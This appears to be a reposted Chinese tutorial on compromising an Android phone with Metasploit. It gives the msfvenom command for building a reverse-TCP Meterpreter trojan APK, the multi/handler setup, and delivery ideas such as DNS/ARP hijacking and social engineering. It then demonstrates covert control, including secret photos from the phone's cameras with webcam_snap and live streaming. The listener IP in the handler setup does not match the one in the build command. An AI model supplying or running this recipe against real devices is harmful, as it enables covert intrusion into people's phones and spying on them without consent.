MSF入侵安卓手机

这篇具有很好参考价值的文章主要介绍了MSF入侵安卓手机。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

MSF是Metasploit的简称,Metasploit是一款开源的安全漏洞检测工具,非常强大,分别有Windows版和Linux版,工具里集成了许多微软公布的漏洞(0day)。

我这里做测试的系统是Backbox linux ,这是一款网络渗透,信息安全评估系统。里边安装了许许多多的工具。其中MSF就自带有。当然还有其它的 比如Kali linux 、Back Track这些等等。

环境:Backbox linux+MSF

目标:一台安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP 

MSF入侵安卓手机

本机IP:192.168.1.6

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > /root/apk.apk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

MSF入侵安卓手机

这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

输入命令:msfconsole

MSF入侵安卓手机

然后输入:

1. use exploit/multi/handler 加载模块

2. set payload android/meterpreter/reverse_tcp  选择Payload

3.show options 查看参数设置

MSF入侵安卓手机

我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口

3.exploit 开始执行漏洞 开始监听...

MSF入侵安卓手机

OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件

还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试

MSF入侵安卓手机

安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了

我们可以在我们的MSF里看见有一个会话连接了

MSF入侵安卓手机

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

MSF入侵安卓手机

MSF入侵安卓手机

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

MSF入侵安卓手机

 webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令 webcam_stream 开启摄像头 

其它的功能还有更多 。暂时就先到这吧。。。

搜集整理的学习路线&笔记https://mp.weixin.qq.com/s/KQx_eIwdjCj3QdErxKb7ZQ文章来源地址https://www.toymoban.com/news/detail-460590.html

到了这里,关于MSF入侵安卓手机的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • Metasploit Framework(MSF)基础框架

    Metasploit框架(Metasploit Framework,MSF)是一个开源工具,旨在方便渗透测试,它是由Ruby程序语言编写的模板化框架,具有很好的扩展性,便于渗透测试人员开发、使用定制的工具模板。 常见名词解释: POC : Proof of Concept ,概念证明,用来证明漏洞存在的一段代码,没有攻击性

    2024年02月08日
    浏览(41)
  • 内网渗透 Metasploit(MSF)基础使用

    ​ Metasploit 是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在 Metasploit 和综合报

    2024年01月16日
    浏览(46)
  • 一、初识Metasploit(MSF使用详解超详细)

    前言 :Metasploit是The Metasploit Framework的简称,也可以叫做MSF! MSF高度模块化即框架由多个module组成,是全球最受欢迎的工具。 Metasploit Framework(MSF)远远不仅仅是一个漏洞的集合。这是您可以建立和利用您的自定义需求的基础架构。这使您可以专注于您独特的环境,而不必重新

    2024年02月08日
    浏览(91)
  • metasploit(MSF)渗透超细解说 -- 小黑渗透工具

    metasploit Framework(msf)里带数千个已知的软件漏洞,并保持持续更新,Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,采用Ruby语言编写。黑掉整个宇宙的称号!!! 初心:    记录msfconsole的渗透测试流程,以及每个流程点常用到的一些命令,其中还有

    2024年01月20日
    浏览(42)
  • 一条命令上线MSF(Metasploit)-web_delivery模块

    最近比较多人问我,如果在实战里getshell了,比如各种OA的rce,但是会碰到权限很低,不是root或者是system权限的情况,而且在拿到shell之后不知道怎么提权,不知道下一步该干嘛,后渗透不是很熟练等等等等。所以我就趁今晚月色那么漂亮,顺便记一下web_delivery模块。 如果被

    2024年02月10日
    浏览(63)
  • Metasploit (MSF) 使用:包含基本使用、payload生成、后渗透模块使用

    博主根据日后学习会不断更新文章,后续用到新的功能会不定时更新。 以下内容只供学习使用,请勿违法使用! 目录 一、常用指令 二、监听模块 2.1 防止假session 2.2 实现后台持续监听 三、msfvenom(payload生成模块) 3.1 参数介绍 3.2 常用指令 3.3 payload 生成 3.3.1 Linux 3.3.2 Windows

    2024年02月07日
    浏览(42)
  • 肥肠恐布--探索Kali Linux中的Metasploit Framework(MSF听说肾透大佬经常用)

    请注意,在使用Metasploit Framework进行渗透测试和漏洞利用时,务必遵守合法和授权的原则,此文仅供大家学习参考,请确保您获得了适当的授权,并遵守法律和合规性要求。非法使用和滥用导致严重的法律后果自负。 目录 前言 一、什么是Metasploit Framework(MSF)? 二、Metaspl

    2024年02月15日
    浏览(43)
  • 记一次MSF永恒之蓝入侵win7系统实验

      目录 1.环境搭建 2.实验开始 1# 保证两个主机之间可以ping通 2# kali打开msfconsole 3# 由于目标为win7系统,我们选择永恒之蓝漏洞攻击(ms17-010) 4# 获取目标机cmd  5# meterpreter基础命令 攻击源ip:192.168.193.130     #系统:kali      镜像下载地址:点击跳转  靶 机  ip:192.168.19

    2024年02月13日
    浏览(37)
  • Metasploit生成Android木马远控自己的安卓设备

    声明,本文实验仅用作学习和测试实验请勿用作他途 我们先用frp工具来实现端口映射,利用处在内网的攻击机kali实现对处在外网的Android机器的入侵。 目标Android设备 公网vps(centos) 内网攻击机kali 公网vps运行frp server 本地kali运行frp client 将kali本地端口映射到公网vps 将vps作为

    2024年02月02日
    浏览(34)
  • MSF手机渗透实验

      本实验是在kail里面使用msf工具生成一个Android木马程序,然后客户端进行下载,从而渗透。 实验范围为局域网的手机,即入侵的手机要与电脑处于同一个网段,这就需要将虚拟机设置为桥接模式,并手动配置ip。 此时手机的ip段为192.168.43.0段故需要更改虚拟机ip 更改静态i

    2024年02月11日
    浏览(45)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包